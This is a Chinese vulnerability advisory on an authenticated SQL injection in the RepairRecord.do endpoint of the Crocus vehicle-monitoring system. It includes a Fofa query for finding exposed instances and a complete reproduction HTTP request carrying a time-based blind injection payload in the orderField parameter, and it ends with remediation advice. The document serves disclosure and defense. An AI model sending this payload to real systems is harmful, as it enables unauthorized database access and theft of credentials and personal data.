锐明Crocus系统 RepairRecord.do SQL注入漏洞

0x01 产品描述:

明锐技术是一家专注于AI和视频技术的商用车智能物联(AIoT)解决方案提供商,Crocus系统是其核心产品之一。该系统旨在利用人工智能、高清视频、大数据和自动驾驶技术,提高企业或车队的运营效率,帮助商用车减少交通事故和货物丢失。通过车载摄像头、毫米波雷达等传感器,Crocus系统能够实现对车辆周围环境的实时感知和监控,显著提升驾驶安全性。此外,利用AI技术,系统能够分析驾驶员的驾驶行为,并及时识别车辆和行人的身份,从而提醒驾驶员注意潜在风险。同时,Crocus系统还具备实时监控货箱状态的能力,包括跟踪货物是否丢失、检查货箱是否关闭等,通过3D检测技术实现更精准的货物识别和管理。

0x02 漏洞描述:

明锐技术的Crocus系统中,RepairRecord.do接口存在SQL注入漏洞,这一漏洞使得经过身份验证的远程攻击者能够利用该接口进行恶意操作。攻击者可以通过SQL注入获取数据库中的敏感信息,例如管理员后台密码和用户个人信息。此外,在某些情况下,攻击者可能获得高权限,甚至能够向服务器写入shell脚本,从而进一步获取服务器的系统权限,导致更严重的安全风险

0x03 搜索语句:

Fofa:body="/ThirdResource/respond/respond.min.js" && title="Crocus"

0x04 漏洞复现:

复制代码
POST /RepairRecord.do?Action=QueryLast HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Token: c3RyZWFtYXgyMDAyMDgxODoxNzI0NjM2OTQyMTA0Ljg4NDU=
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: Saffron.U=VUlEPTEmVU49c3RyZWFtYXgyMDAyMDgxOCZHSUQ9MTcyNDYzNjk0MjEwNC44ODQ1MTQmUklEPTEmTT1CTWFwJklOUz0x
Connection: close

EndTime=2024-08-20+00%3A00%3A00&PageIndex=0&PageSize=20&RepairState=-1&StartTime=2024-08-26+00%3A00%3A00&orderField=(select*from(select%0asleep(5))a)&orderType=asc

0x05 修复建议:

关闭互联网暴露面或接口设置访问权限。

建议对所有输入数据进行严格验证,并使用参数化查询。同时,应限制数据库用户的权限,仅授予执行必要操作所需的最低权限。定期进行安全审计,以发现并修复潜在的安全漏洞。

相关推荐
Aphasia31121 小时前
VPN 与内网穿透
安全
Mr_愚人派2 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao3 天前
【无标题】
人工智能·安全
Alsn863 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker
网络研究院3 天前
2026年网络安全
网络·安全·法律·法规·趋势·发展
treesforest3 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
零零信安3 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
开发小能手-roy3 天前
StringBuilder vs StringBuffer:2024年还需要线程安全字符串吗?
开发语言·python·安全
_阿伟_3 天前
JWT介绍
安全
zhengfei6113 天前
小白级手册——全面剖析红队信息收集思考
网络·安全·web安全